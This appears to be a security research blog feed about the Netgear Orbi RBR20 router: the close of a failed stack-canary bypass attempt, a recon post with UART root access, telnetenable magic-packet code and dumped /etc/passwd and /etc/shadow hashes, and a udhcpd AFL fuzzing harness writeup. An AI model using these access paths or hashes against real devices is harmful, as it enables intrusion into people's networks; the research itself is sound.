Since I hadn’t found any ways to leak memory, the only real option I would have is bruteforcing. There’s a specific bruteforcing technique that can greatly reduce the total number of attempts needed to determine the canary value by guessing one byte at a time, using the lack of a crash as an oracle to determine when the correct byte has been guessed and repeating this for each byte of the canary. As mentioned above, this only works under certain conditions: the program must keep the same canary between payloads (i.e. fork-and-accept servers) and the code that reads the payload must not append a NULL byte (e.g.read / recv). I found a few good resources that helped me better understand this concept such as this LiveOverflow video and this CTF guide (screenshot below taken from here)



Seems easy enough, right? I went back to the device and determined the minimum length to overflow the buffer and trigger the stack check fail was 209 characters. After sending only a couple of requests and watching the values in the debugger I quickly realized this wasn’t going to work at all.

The output belows shows the debugger breaking at the start of __stack_chk_fail() with r2 containing the local copy of the stack canary that has been overwritten by a single byte and r3 containing the original. As you can see, the byte that was written was 00 (NULL) — the function that reads the payload into the buffer (sscanf()) appends a NULL. So, the first condition for this to be viable is out.

Thread 2.1 "soap-api" hit Breakpoint 2, 0xb698be40 in __stack_chk_fail () from /lib/libc.so.1
#0  0xb698be40 in __stack_chk_fail () from /lib/libc.so.1
No symbol table info available.
Backtrace stopped: Cannot access memory at address 0x4f532f34
Stack level 0, frame at 0xbecd34c8:
 pc = 0xb698be40 in __stack_chk_fail; saved pc = 0xb6e8faa8
 Outermost frame: Cannot access memory at address 0x4f532f34
 Arglist at 0xbecd34c8, args:
 Locals at 0xbecd34c8, Previous frame's sp is 0xbecd34c8
r0             0x0      0
r1             0xb6edeb65       3069045605
**r2             0xb710d200       3071332864**
r3             0xb710d29e       3071333022
r4             0x0      0
r5             0xb6a16214       3064029716
r6             0xb6f08b80       3069217664
r7             0xbecd360c       3201119756
r8             0xbecd354c       3201119564
r9             0xbecd350c       3201119500
r10            0xbecd34e4       3201119460
r11            0xb6f0e6fc       3069241084
r12            0xb6f08c6c       3069217900
sp             0xbecd34c8       0xbecd34c8
lr             0xb6e8faa8       -1226245464
pc             0xb698be40       0xb698be40 <__stack_chk_fail>
cpsr           0x80000010       -2147483632


Not only that, the canary value was changing in between each request. In retrospect, this is obvious since soap-api is not forking itself to handle the requests, but instead being execve‘ed at some point after lighttpd forks.

So, yeah — (smarter) bruteforcing was out of the question. Since along the way I’d also learned PIE and RELRO was enabled on the binary, I called it quits at this point and feel pretty confident in saying this isn’t an exploitable issue.

conclusion

This turned out to be a long journey that gave me a chance to become more familiar with some of the internals of this system. It also forced me to get creative in finding ways to debug and test things out, which taught me some new tricks. In the end, I was able to definitively confirm the buffer overflow could be reached, but the mitigations in place combined with the nuances of the environment proved to be enough to thwart my exploitation attempts.

Alas, this is the life of security research — sometimes, even when you’ve found the bug, there’s still no guarantee you’ll be able to exploit it.

references


  Stack Canaries – Gingerly Sidestepping the Cage [2021]
  LiveOverflow video
  CTF guide on stack canaries
  Bruteforcing x86 Stack Canaries



orbi hunting 0x0: introduction, UART access, recon
2022-06-12T00:00:00+00:00
I’ve been hunting for bugs on the Netgear Orbi (RBR20) for about a year and half now. This is the first in a series of posts where I’ll be publishing my notes and findings from this research. This post provides an high-level overview of the system and notes on getting serial console access via UART.

Introduction
I wanted to upgrade the WiFi at home a few years ago and ended up purchasing one of Netgear’s Orbi line of mesh WiFi routers. After about a year I ended doing a ‘real’ upgrade to some Ubiquiti equipment, so I had this Orbi just laying around and decided to use it as a target for bug hunting. I’ve done a bit of research against IoT devices in the past and wanted something new to look into. I’ve now been hunting on this device for about a year and half, walking away and coming back to it multiple times, and sometimes going months without doing anything with it. Over this time I’ve explored a few angles and documented quite a bit of it so I thought I’d just start dumping some of this information here, mostly in the hopes that it may be useful to anyone else in the future who may be interested in doing their own hunting on this device.



Minor disclaimer: This series of posts may be a bit disjointed and may not always provide much of a narrative. As mentioned above, it’s meant to be a data dump and not so much a walkthrough of every step I took along the way. Where possible I’ll provide context around how I came to certain conclusions, why I decided to look in a particular area, and any other information that I think may be useful to others.

Overview

System Details


  Device: Netgear Orbi (RBR20)
  Firmware Version(s):
    
      2.5.1.16 (Download)
      2.7.33 (Download)
    
  
  Architecture: ARMv7 rev 5
  Kernel: Linux RBR20 3.14.77 #2 SMP PREEMPT
  OS: Customized OpenWRT Chaos Calmer image


Hardware Details
Basic Specs

  Processor: Quad-Core ARM Cortex-A7, Qualcomm
  Memory: 1GB RAM
  Storage: 512MB NAND flash
  Radio: 2.4Ghz + 5Ghz wireless


Board Layout and Components

I took a look at the FCC listing for this particular device and reviewing the internal photographs but soon discovered that the images on this site didn’t exactly match my device and certain components were either different brands/devices or missing entirely from the images compared to my actual device. In any case, this still provided a good point of reference that would help with getting a general understanding of where things were supposed to be.

The top of the PCB exposes the following components:

  BLE + Wifi SoC
  CPU (beneath a shield)
  Voltage regulator
  RJ45 ports
  Power input
  UART pins


The bottom side of the PCB:


  Winbond NAND flash
  NANYA DRAM


 

Firmware Extraction

I used binwalk to extract the root filesystem from the firmware images provided by Netgear. This successfully extracted the embedded squashfs filesystem.

Below is a listing of the root directory from the extracted filesystem:

drwxr-xr-x  3 builder builder  4096 Feb 13 02:20 __rd_debug_only
drwxr-xr-x  2 builder builder  4096 Feb 13 02:20 bin
-rw-r--r--  1 builder builder     9 Feb 13 00:47 cloud_version
drwxr-xr-x  3 builder builder  4096 Feb 13 02:20 data
drwxr-xr-x  2 builder builder  4096 Feb 13 02:20 dev
drwxr-xr-x 33 builder builder  4096 Feb 13 02:20 etc
-rw-r--r--  1 builder builder    11 Feb 13 00:47 firmware_language_version
-rw-r--r--  1 builder builder     1 Feb 13 00:47 firmware_region
-rw-r--r--  1 builder builder    29 Feb 13 00:47 firmware_time
-rw-r--r--  1 builder builder    10 Feb 13 00:47 firmware_version
-rw-r--r--  1 builder builder    11 Feb 13 00:47 flash_type
-rw-r--r--  1 builder builder    11 Feb 13 00:47 hardware_version
lrwxrwxrwx  1 builder builder     4 Feb 13 00:47 home -> /tmp
-rw-r--r--  1 builder builder    31 Feb 13 00:47 hw_id
drwxr-xr-x 18 builder builder  4096 Feb 13 02:20 lib
lrwxrwxrwx  1 builder builder     8 Feb 13 00:47 mnt -> /tmp/mnt
-rw-r--r--  1 builder builder     6 Feb 13 00:47 module_name
drwxr-xr-x  5 builder builder  4096 Feb 13 02:20 opt
lrwxrwxrwx  1 builder builder    12 Feb 13 00:47 overlay -> /tmp/overlay
drwxr-xr-x  2 builder builder  4096 Feb 13 00:47 proc
drwxr-xr-x  2 builder builder  4096 Feb 13 02:20 rom
drwxr-xr-x  2 builder builder  4096 Feb 13 02:20 root
drwxr-xr-x  3 builder builder 12288 Feb 13 02:20 sbin
drwxr-xr-x  2 builder builder  4096 Feb 13 00:47 sys
drwxr-xr-x  2 builder builder  4096 Feb 13 02:20 tmp
drwxr-xr-x  9 builder builder  4096 Feb 13 02:20 usr
lrwxrwxrwx  1 builder builder     4 Feb 13 00:47 var -> /tmp
drwxr-xr-x 14 builder builder 57344 Feb 13 02:20 www


GPL Code

Apart from the files from extracted firmware images, I also downloaded the GPL code for each of the firmware versions I looked at. Download links for these packages can be found on this page for Netgear, though most vendors provide these packages as required by the license. They include source code all GPL code they use and/or modified to create the system.


  GPL Code for v2.5.1.16
  GPL Code for v2.7.33


The majority of the custom code/interesting files are located under the git_home directory of the extracted archive (which is an OpenWrt buildroot directory).

Note: While having vendors provide their modified code sounds great in theory, the reality is a little different. For example, the GPL packages for the Orbi include a lot of source code, but specific open source applications they made modified copies of are given in binary form only.




Firmware 2.5.1.16 vs. 2.7.33 Changes

There are a couple of important things that changed between these two firmware versions that I want to mention here.

(Easy) Telnet Access Removed

First, in the older version it was possible to enable Telnet access via the hidden debug page at http:///debug_detail.htm when logged in as the admin user. This was removed in the later version and it is no longer trivial to enable Telnet. There does appear to still be Netgear’s custom Telnet server telnetenable that listens on UDP port 23 and will only “activate” upon receiving a ‘magic’ packet containing username/pass and other info in a specific format (see here).

The code for this binary is included in the GPL packages. Version 2.5.x seems to have only allowed the use of this feature if the Region was set to Chinese and the Region file contained “WW” (shown below). The 2.7.x version doesn’t include this check and simply compares the received data against a local version it constructs (the main server loop is shown below):

	for (;;) {
		FD_ZERO(&readable);
		FD_SET(fd, &readable);

		if (select(fd + 1, &readable, NULL, NULL, NULL) < 1)
			continue;

		slen = sizeof(struct sockaddr_in);
		r = recvfrom(fd, rbuf, sizeof(rbuf), 0, (struct sockaddr *)&from, &slen);
		if (r < 1)
			continue;

		datasize = fill_payload(output_buf);
		if (r == datasize && memcmp(rbuf, output_buf, r) == 0) {
			/* maybe it's better to judge whether utelnetd is running in real time here */
			if (telnet_enabled == 0) {
				printf("The telnet server is enabled now!!!\n");
				system(TELNET_CMD);
				telnet_enabled = 1;
			}
			sendto(fd, ack, 3, 0, (struct sockaddr *)&from, slen);
		}
	}


Even so, I’ve yet to successfully enable Telnet even when using known-good credentials with either the telnet version linked above or my own customized version of the code included in the GPL packages.

Binaries in GPL Packages Stripped

The earlier version of GPL code package provided binaries that had not been stripped of debug symbols, making reverse engineering of these specific applications much easier. They’re still useful for reversing newer binaries though as most functions are still intact and knowing exactly what everything should be called always helps.

The paths to some of these binaries are provide here (these are paths on the root filesystem of the device):

/usr/sbin/net-cgi
/usr/sbin/soap-api
/usr/sbin/miniupnpd





UART Serial Console Access

After losing Telnet access when my device was inintentionally upgraded, I moved on to seeing if I could get access to a console over serial. My device still had pins connected as shown below so this immediately caught my attention as being a potential serial interface. I found info online for other Orbi models that showed the correct pin layout.

Starting with the pin closes to the RJ45 port:


  GND, RX, TX, power (not needed)




I connected to these pins on the board using an FTDI serial-USB converter in the 3.3v configuration at 115200 baud (8N1) and successfully dropped into a root shell.

Bonus: GreatFET ONE UART Setup

After confirming this worked with the FTDI converter, I decided to use my GreatFET ONE board moving forward. This is an interesting hardware hacking tool I bought some time ago to begin experimenting with USB fuzzing/analysis. It allows for USB proxying and emulation of various USB devices (keyboard, storage, etc) through a programmatic interface using Python.

I remembered that it can also be used for serial/UART connections but had a difficult time finding any good documentation or examples of doing this. Eventually, I was able to get this working by connecting pins to the following ports on the GreatFET’s J1 bank of I/O pins (see full pin table here):


  1:GND
  33:RX
  34:TX


I then used the built-in UART script provided by the greatfet library/CLI tool:

greatfet uart --wait -P none -N





Recon Dump

boot log highlights

CPU Info:
Booting Linux on physical CPU 0x0
Linux version 3.14.77 (lijun.xue@cnshadnicp03.deltaos.corp) (gcc version 5.2.0 (OpenWrt GCC 5.2.0 r6043) ) #1 SMP PREEMPT Fri Jun 4 19:11:51 CST 2021
CPU: ARMv7 Processor [410fc075] revision 5 (ARMv7), cr=10c5387d
CPU: PIPT / VIPT nonaliasing data cache, VIPT aliasing instruction cache
Machine model: Qualcomm Technologies, Inc. IPQ40xx/AP-DK04.1-C1
PERCPU: Embedded 8 pages/cpu @dfbc7000 s8448 r8192 d16128 u32768
Built 1 zonelists in Zone order, mobility grouping on.  Total pages: 125952


Kernel memory layout:
Virtual kernel memory layout:
    vector  : 0xffff0000 - 0xffff1000   (   4 kB)
    fixmap  : 0xfff00000 - 0xfffe0000   ( 896 kB)
    vmalloc : 0xe0800000 - 0xff000000   ( 488 MB)
    lowmem  : 0xc0000000 - 0xe0000000   ( 512 MB)
    pkmap   : 0xbfe00000 - 0xc0000000   (   2 MB)
    modules : 0xbf000000 - 0xbfe00000   (  14 MB)
      .text : 0xc0208000 - 0xc073e1fc   (5337 kB)
      .init : 0xc073f000 - 0xc076a100   ( 173 kB)
      .data : 0xc076c000 - 0xc07abb38   ( 255 kB)
       .bss : 0xc07abb38 - 0xc0804680   ( 355 kB)
SLUB: HWalign=64, Order=0-3, MinObjects=0, CPUs=4, Nodes=1
Preemptible hierarchical RCU implementation.


System Users

root@RBR206:/# cat /etc/passwd
root:$5$BChRWDkyPlaOVrGS$/kQaqSCIWiiM36IuwS5phJHhpzdnP9osEVONs4CZa3C:0:0:root:/tmp:/bin/ash
guest:*:65534:65534:guest:/tmp/ftpadmin:/bin/ash
nobody:*:65534:65534:nobody:/var:/bin/false
daemon:*:65534:65534:daemon:/var:/bin/false
admin:x:1:1:Linux User,,,:/tmp/ftpadmin:/bin/ash

root@RBR206:/# cat /etc/shadow 
guest::10957:0:99999:7:::
admin:$1$QPu5pxAi$ITZQ21EZg7P2B48TsiQwg1:18612:0:99999:7:::


Listening Processes (netstat -lp)

root@RBR20:/# netstat -lp
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 10.13.13.1:7272         0.0.0.0:*               LISTEN      15890/circled
tcp        0      0 0.0.0.0:www             0.0.0.0:*               LISTEN      8278/lighttpd
tcp        0      0 0.0.0.0:domain          0.0.0.0:*               LISTEN      16137/dnsmasq
tcp        0      0 0.0.0.0:https           0.0.0.0:*               LISTEN      8278/lighttpd
tcp        0      0 :::www                  :::*                    LISTEN      8278/lighttpd
tcp        0      0 :::56688                :::*                    LISTEN      7298/miniupnpd
tcp        0      0 :::domain               :::*                    LISTEN      16137/dnsmasq
tcp        0      0 :::https                :::*                    LISTEN      8278/lighttpd
udp        0      0 10.13.13.1:38407        0.0.0.0:*                           7298/miniupnpd
udp        0      0 10.13.13.1:23           0.0.0.0:*                           12782/telnetenable
udp        0      0 0.0.0.0:domain          0.0.0.0:*                           16137/dnsmasq
udp        0      0 0.0.0.0:bootps          0.0.0.0:*                           2646/udhcpd
udp        0      0 0.0.0.0:tftp            0.0.0.0:*                           8334/tftpd-hpa
udp        0      0 0.0.0.0:1900            0.0.0.0:*                           7298/miniupnpd
udp        0      0 0.0.0.0:45226           0.0.0.0:*                           5777/net-scan
udp        0      0 10.13.13.1:5351         0.0.0.0:*                           7298/miniupnpd
udp        0      0 :::domain               :::*                                16137/dnsmasq


Mount Points

root@RBR20:~# mount
rootfs on / type rootfs (rw)
/dev/root on /rom type squashfs (ro,relatime)
proc on /proc type proc (rw,nosuid,nodev,noexec,noatime)
sysfs on /sys type sysfs (rw,nosuid,nodev,noexec,noatime)
tmpfs on /tmp type tmpfs (rw,nosuid,nodev,noatime)
overlayfs:/tmp/overlay on / type overlayfs (rw,relatime,lowerdir=/,upperdir=/tmp/overlay)
tmpfs on /dev type tmpfs (rw,nosuid,relatime,size=512k,mode=755)
devpts on /dev/pts type devpts (rw,nosuid,noexec,relatime,mode=600)
debugfs on /sys/kernel/debug type debugfs (rw,noatime)
ubi0:vol_ntgr on /tmp/mnt/ntgr type ubifs (rw,relatime)
ubi0:vol_arlo on /tmp/dal type ubifs (rw,relatime)
ubi0:vol_devtable on /tmp/device_tables type ubifs (rw,relatime)
ubi0:vol_circle on /tmp/mnt/circle type ubifs (rw,relatime)


Web Servers

Web servers will be discussed in further detail in a future post but for now I’ll just cover some of the basics.

The following binaries provide an HTTP server or otherwise involved in handling HTTP-formatted requests.

/usr/sbin/lighttpd
/usr/sbin/net-cgi
/usr/sbin/soap-api
/www/cgi-bin/proccgi



  lighttpd is the main user-facing web server process the handles requests, mostly wraps around net-cgi
  net-cgi handles the bulk of admin functionality that reads underlying system configs and makes config changes
    
      net-cgi responses are typically embedded within responses returned by lighttpd within iframes or as raw data written back to the FD.
    
  
  soap-api is the binary called by the CGI handler to handle SOAP requests. All requests to /soapapi.cgi or /soap/server_sa are routed to this binary. It is a CGI application that reads most of the request data from environment variables (it expects that parent process to set all of this up prior to spawning soap-api).


Only the following pages are accessible prior to authentication:

/unauth.cgi
/passwd_reset.cgi
/basic_home_result.txt
/debuginfo.htm





Wrapping Up
Okay, that was a ton of info.

As mentioned above, future posts will dive deeper into specific areas of interest and include some of my findings in these areas.

References


  netgear-telnetenable Python script
  Orbi RBR20 FCCID.io page
  Netgear GPL Downloads page
  GreatFET One



fuzzing udhcpd: a hacky approach
2022-06-05T00:00:00+00:00
I wanted to do some fuzzing against udhcpd recently but was feeling too lazy to write a harness from scratch, so instead modified the existing udhcp server code to turn it into a harness using AFL’s LLVM persistent mode and then modified the udhcp client (udhcpc) to generate a corpus of testcases and write them out to files. Here’s what I was able to put together over a weekend.

Introduction
I’ve been looking at a router on and off for a little over a year now and recently began looking at fuzzing some of the code for exposed services, one of them being DHCP. As DHCP is reachable pre-auth, I was interested in seeing whether there may be any bugs that could be triggered via DHCP messages. Specifically, I wanted to use AFL to fuzz the functions that parsed/handled DHCP client messages. For the first run, I focused on DHCPDISCOVER messages.

This post will go over an idea I had for how to create a custom fuzzing harness and the steps I took to get everything working. This includes:




  Create a fuzzing harness from the udhcpd server code using AFL’s LLVM persistent mode fuzzing feature
  Generate a fuzzing corpus using the udhcpc client code to produce dhcpMessage data and write it to files


Disclaimer: this post contains 0 0days. Sorry!

A Hacky(?) Approach

Before I could get started I needed to figure out how to create a harness that I could use to fuzz the target functions with AFL, which isn’t designed to do network-based fuzzing. There are forks of AFL that do support network fuzzing, but I hadn’t looked into them much and I had an idea for how I might be able to do it that would allow me to remove the socket binding entirely.

The idea was basically this:


  Create a modified version of the udhcp client code (udhcpc) to generate valid DHCP message packets and write the raw bytes of the data structures to files
  Create a modified version of the udhcp server code (udhcpd) that reads packet data from the output files instead of from the network and then enter a fuzzing loop where that seed data is continuously mutated and resubmitted for fuzzing


I chose to use AFL’s persistent mode feature since it would allow me to target only the code used to handle DHCPDISCOVER messages and would improve overall performance. This also fit perfectly for my idea since persistent mode does almost exactly what I wanted (enter a fuzzing loop to target specific functions). You can learn more about persistent mode here.

Dev Setup

Below are the details for the working environment and tools I used throughout the development of the project:


  OS: Ubuntu Server 20.04 VM
  Specs: 8 cores, 16Gb RAM (you definitely don’t need this to just build the code but it helps for the actual fuzzing part!)
  Tools: Docker, vim, AFL++


For simplicity’s sake, I chose to use the AFL++ docker container rather than go through the setup needed to install the necessary LLVM/Clang versions required for AFL’s persistent mode. This offers a fully functional working environment where you can easily mount your target source code and compile with the desired instrumentation.

docker run -ti -v $PWD:/src aflplusplus/aflplusplus


About udhcp

This application is now built directly into Busybox, but used to be distributed as a standalone application that provides both server and client functionality. The router in question is running a modified version of udhcpd version 0.9.8. I was able to get the source code for the modified version but couldn’t get it to build so I just went with the vanilla source downloaded from here.

Code Review

I began by reviewing the code in dhcpd.c to identify where handling of DHCPDISCOVER messages was being done and to get a feel for how the code worked. dhcpd.c is a relatively small file (less than 300 LOC) and the main function contains entry points for handling every type of DHCP client message.

The code begins by declaring and initializing some variables and then loading the server configuration from a config file:

memset(&server_config, 0, sizeof(struct server_config_t));
	
	if (argc < 2)
		read_config(DHCPD_CONF_FILE);
	else read_config(argv[1]);


After this the code  does some more initialization of vars and server config values from the parsed config file and then enters the main server loop that handles receiving packets for processing. The capture of packets is done by get_packet() in the following code, which parses the packet into a dhcpMessage struct called packet:

if ((bytes = get_packet(&packet, server_socket)) < 0) { /* this waits for a packet - idle */
			if (bytes == -1 && errno != EINTR) {
				DEBUG(LOG_INFO, "error on read, %s, reopening socket", strerror(errno));
				close(server_socket);
				server_socket = -1;
			}
			continue;
		}


Immediately after this, the code parses the DHCP message type from packet and saves it to state:

if ((state = get_option(&packet, DHCP_MESSAGE_TYPE)) == NULL) {
			DEBUG(LOG_ERR, "couldn't get option from packet, ignoring");
			continue;
		}


The value saved to state is then used in a switch statement with cases for handling each type of DHCP message. This is where the handling for DHCPDISCOVER is defined, which calls a single function, sendOffer(), passing in packet as an argument:

switch (state[0]) {
		case DHCPDISCOVER:
			DEBUG(LOG_INFO,"received DISCOVER");
			
			if (sendOffer(&packet) < 0) {
				LOG(LOG_ERR, "send OFFER failed");
			}
			break;
		<--- snip --->
}


With all of this in mind, I made the following determinations:


  The testcase data would need to be read/parsed into a dhcpMessage struct so that it can be passed to the target function
  The target function would be sendOffer()
  The best place to insert the fuzzing loop would be right before entering the switch block that checks the DHCP message type





Creating the Harness

To get started, I created a copy of the original dhcpd.c file that I would use to create the harness.

Server Configuration and Initialization

Most of the original code that handles the reading of the config file, initialization of the server_config global structure, memory allocation for leases, and reading of the network interface for more server_config initialization was left as-is except for some minor changes (shown here):

  // read config file into server_config global
	memset(&server_config, 0, sizeof(struct server_config_t));
	read_config("./test-udhcpd.conf"); // edit: hardcode the config file name

	pid_fd = pidfile_acquire(server_config.pidfile);
	pidfile_write_release(pid_fd);
  server_config.lease = LEASE_TIME; // edit: always use default lease time
	
	// allocate mem for leases and read from lease file
	leases = malloc(sizeof(struct dhcpOfferedAddr) * server_config.max_leases);
	memset(leases, 0, sizeof(struct dhcpOfferedAddr) * server_config.max_leases);
	read_leases(server_config.lease_file);

	if (read_interface(server_config.interface, &server_config.ifindex,
			   &server_config.server, server_config.arp) < 0)
		return 1;


As shown above, the harness is hardcoded to search for a config file named test-udhcpd.conf in the local working directory. Below is a minimal configuration file used for the harness (the start/end values and the interface must match the actual network configuration of the host where the harness will run):

start 		172.0.2.10	  #default: 192.168.0.20
end		    172.0.2.20	  #default: 192.168.0.254
interface	eth0		      #default: eth0
opt	dns	  192.168.10.2 192.168.10.10
option subnet	255.255.255.0
opt	router	172.0.2.1
option	  domain	local
option	  lease	864000		# 10 days of seconds


Inserting the Persistent Mode Fuzzing Loop

I then replaced the infinite server loop (while (1)) with the main AFL fuzzing loop (_while (__AFL_LOOP())). Since testcase data was going to be passed in via input files, there was no need to have the server bind to a socket and actually listen for packets, so I removed the majority of the server networking code from the start of the main loop.

I replaced this code with the code needed to reset state, read the testcase data into a dhcpMessage structure, and call the target function. Specifically, this code does the following:


  Zeroing out the leases buffer and reinitializing it by calling read_leases() to ensure each loop starts with the same state
  After a sanity check of the testcase buffer size, the dhcpMessage struct that will hold the testcase data is zeroed out and the data is copied to the fuzz_packet struct using memcpy.
  The DHCP message type is then read from the fuzz_packet struct and saved to state . If no valid message type is found we continue to next testcase; otherwise the original switch block from the server code is entered with a single case to match DHCPDISCOVER messages.
  The fuzz data in fuzz_packet is passed to sendOffer()


The final code within the fuzzing loop is shown below:

int main(int argc, char *argv[])
{	

  [... SNIP ...]

	// START AFL LOOP
		__AFL_INIT();

		unsigned char *aflbuf = __AFL_FUZZ_TESTCASE_BUF; // afl will automatically read the file data into this buf
	
		while (__AFL_LOOP(10000000)) {
			// reset leases at the start of each run
			memset(leases, 0, sizeof(struct dhcpOfferedAddr) * server_config.max_leases);
			read_leases(server_config.lease_file);
			
			// check len is good
			ssize_t afllen = __AFL_FUZZ_TESTCASE_LEN;
			if (afllen > sizeof(struct dhcpMessage)) continue;
	
			struct dhcpMessage fuzz_packet;
			memset(&fuzz_packet, 0, sizeof(struct dhcpMessage));
			memcpy(&fuzz_packet, aflbuf, sizeof(struct dhcpMessage));
	
			if ((state = get_option(&fuzz_packet, DHCP_MESSAGE_TYPE)) == NULL) {
				continue;
			}

			lease = find_lease_by_chaddr(fuzz_packet.chaddr);
			
			// Pass the testcase data to the target functions based on message type
			switch (state[0]) {
				case DHCPDISCOVER:
					if (sendOffer(&fuzz_packet) < 0) {
						printf("send OFFER failed");
					}
					break;
			default:
				continue;
		}
	}
	return 0;
}




Generating Testcases

Next, I had to figure out a way to generate testcases and write them out to files to make them readable by AFL, since this is how it’s designed to read inputs. To accomplish this I used the DHCP client code included with udhcp to generate valid dhcpMessage structures and write the raw bytes out to disk.

Creating Packets

The majority of the client components are located in dhcpc.c and clientpacket.c. Upon reviewing the code, I found that dhcpMessage objects are initialized with the function init_packet(); this function is called by other higher-level functions used to create specific types of DHCP messages (send_discover(), send_renew(), etc). Below is an example of one of these functions, used to send DHCP Discover messages:

/* Broadcast a DHCP discover packet to the network, with an optionally requested IP */
int send_discover(unsigned long xid, unsigned long requested)
{
	struct dhcpMessage packet;

	init_packet(&packet, DHCPDISCOVER);
	packet.xid = xid;
	if (requested)
		add_simple_option(packet.options, DHCP_REQUESTED_IP, requested);

	add_requests(&packet);
	LOG(LOG_DEBUG, "Sending discover...");
	return raw_packet(&packet, INADDR_ANY, CLIENT_PORT, INADDR_BROADCAST, 
				SERVER_PORT, MAC_BCAST_ADDR, client_config.ifindex);
}


This actually made things incredibly easy — all I had to do was make modified copies of these higher-level functions that I could use to generate mutated packets and write them to files. I made a new file in the source directory for the testcase generator and copied over the relevant code from dhcpc.c and clientpacket.c . I won’t post the code for every modified function to keep things readable but below is an example of the modified version of the send_discover() function showed in the code block above.

/* Broadcast a DHCP discover packet to the network, with an optionally requested IP */
static void make_discover(struct dhcpMessage *packet, unsigned long xid, unsigned long requested)
{
	printf("debug - discover start\n");
	init_packet_fuzz(packet, DHCPDISCOVER);
	packet->xid = xid;
	if (requested)
		printf("requested ip\n");
		add_simple_option(packet->options, DHCP_REQUESTED_IP, requested);

	add_requests_fz(packet);
	printf("debug - add_req finished\n");

	// EDIT: Removed code the sends the packet over the network
  // return raw_packet(&packet, INADDR_ANY, CLIENT_PORT, INADDR_BROADCAST, 
	//			SERVER_PORT, MAC_BCAST_ADDR, client_config.ifindex);
}


For each of these functions, I removed the calls to raw_packet() that were present in the originals; this function takes care of adding TCP/UDP headers to the packet and actually sending the packet over the network. Apart from the fact that we don’t actually need to send any packets since we intend to write the out to files, we also don’t need to to add TCP/UDP headers since the target function sendOffer() expects to receive a parsed dhcpMessage struct which has already been read from the socket and stripped of the encapsulating layer. Instead, each of these functions just returns after initializing the packet arg (this is passed by reference, so the calling function has the pointer to packet).

Additionally, I also created a couple of customized versions of the init_packet() function that would allow me to easily pass in custom values for fields I might want to focus on. For example, I created a version that would allow me to pass in a custom length value for the vendor_id that’s added to the packet using add_option_string() :

static void init_packet_long_vendor_str(struct dhcpMessage *packet, char type, unsigned int fuzz_length)
{
	struct vendor  {
		char vendor, length;
		char str[sizeof("udhcp")];
	} vendor_id = { DHCP_VENDOR,  (sizeof("A") * fuzz_length) - 1, "udhcp"};
	
	init_header(packet, type);
	memcpy(packet->chaddr, client_config.arp, 6);
	add_option_string(packet->options, client_config.clientid);
	if (client_config.hostname) add_option_string(packet->options, client_config.hostname);
	add_option_string(packet->options, (unsigned char *) &vendor_id);
}


Handling the Client Configuration

With the modified functions in place, I then moved onto main(), which is where I would call these customized functions to create the testcase files. The original main() begins by parsing command-line arguments for configuration options and initializing a global client_config struct. As is probably obvious, this contains the various configuration values used by the DHCP client, and a lot of the code reads from this data structure.

I wanted to be sure this got properly initialized but didn’t want to have to pass in commandline arguments, so I created the following function using the same code from the original main() but modified to only initialize the important config values needed for my purposes.

static void create_fuzz_client_config(char *hostname, char *interface, char *client_id)
{
		// set the client ID
    int len = strlen(client_id) > 255 ? 255 : strlen(client_id);
    if (client_config.clientid) free(client_config.clientid);
    client_config.clientid = xmalloc(len + 2);
    client_config.clientid[OPT_CODE] = DHCP_CLIENT_ID;
    client_config.clientid[OPT_LEN] = len;
    client_config.clientid[OPT_DATA] = '\0';
    strncpy(client_config.clientid + OPT_DATA, client_id, len);

		// set the hostname
    len = strlen(hostname) > 255 ? 255 : strlen(hostname);
    if (client_config.hostname) free(client_config.hostname);
    client_config.hostname = xmalloc(len + 2);
    client_config.hostname[OPT_CODE] = DHCP_HOST_NAME;
    client_config.hostname[OPT_LEN] = len;
    strncpy(client_config.hostname + 2, hostname, len);
		
		// set the network interface
    client_config.interface = interface;
}


Finally, I created a small function to handle the actual writing of the packet data to disk:

int write_packet_to_testcase_file(struct dhcpMessage *packet, char *type_prefix) {
    FILE *fd;
    char outname[64];
    sprintf(outname, "./%s_%ld", type_prefix, time(0));
    fd = fopen(outname, "wb");
    int res = fwrite(&packet, sizeof(struct dhcpMessage), 1, fd);
    printf("wrote packet data to file: '%s'\n", outname);
    fclose(fd);
    return res;
}


With all of these pieces in place, I was able to replace almost all of the code from the original main() with  calls to the custom packet functions to generate packets and then writing the packet data to output files. Below is a snippet of some of the testcases I created:

    // normal discover packet
	  struct dhcpMessage discover_1;
    printf("[+] creating testcase: discover 1\n");
    make_discover(&discover_1, random_xid(), requested_ip);
    write_packet_to_testcase_file(&discover_1, "discover_1");

	  // discover with long vendor_id
	  struct dhcpMessage discover_long_vendor;
    printf("[+] creating testcase: discover long\n");
    init_packet_long_vendor_str(&discover_long_vendor, DHCPDISCOVER, 255);
    write_packet_to_testcase_file(&discover_long_vendor, "discover_long");

	  // discover with tweaked vendor_id
	  struct dhcpMessage discover_mut;
    printf("[+] creating testcase: discover custom vendor\n");
    make_discover(&discover_long_vendor, random_xid(), requested_ip);
    add_custom_vendor_id(&discover_mut, "AAAAAAAAAAAAAAAA", 40);
    write_packet_to_testcase_file(&discover_mut, "discover_cvendor");


I created a modified Makefile from the original to only build the client components I needed and was able to successfully compile the application. I ran this was and produced valid testcase files that I could feed to the harness.

Note: Testcases Should Be Generated on the Fuzzing Node

One consequence of this approach to generating the testcases was the testcase files needed to be generated on the same host where the fuzz job would  run. This is due to the fact that the application reads from the configured network interface and uses it to determine which IPs and MAC addresses it uses in various places when generating packets. While this likely doesn’t matter for the harness (since it won’t be sending packets or checking leases, doing arp pings, etc), it is likely that any crashes or interesting outputs will only be reproduceable against a vanilla version of udhcpd running on the same host where the testcases were generated running a compatible configuration, since that code will perform those checks and attempt to send packets. So, to keep things as consistent as possible, it’s best to do everything on the same machine.

This means that, ideally, the testcase generator should be configured to use one network interface while the harness/vanilla server uses another on the same host. This should ensure that when trying to reproduce issues the packets will appear to be coming from a MAC address that the server can know about/reach and that values will be compatible with the network configuration.




Resolving Issues

ARP Ping Timeouts

I was initially able to run afl-fuzz and get a job actually running but eventually noticed that I had made a typo in the config file where I defined the starting address range for the server. The typo resulted in an invalid IP address (1011.13.13.50) which I had missed since I couldn’t see output from the bin when running with AFL.

After fixing the typo and adding a valid address, I immediately ran into timeout issues when trying to run afl-fuzz again. A bit of troubleshooting later, I was able to isolate the timeouts as being caused by the following call chain:


  [sendOffer() → find_address() → check_ip() → arpping()]


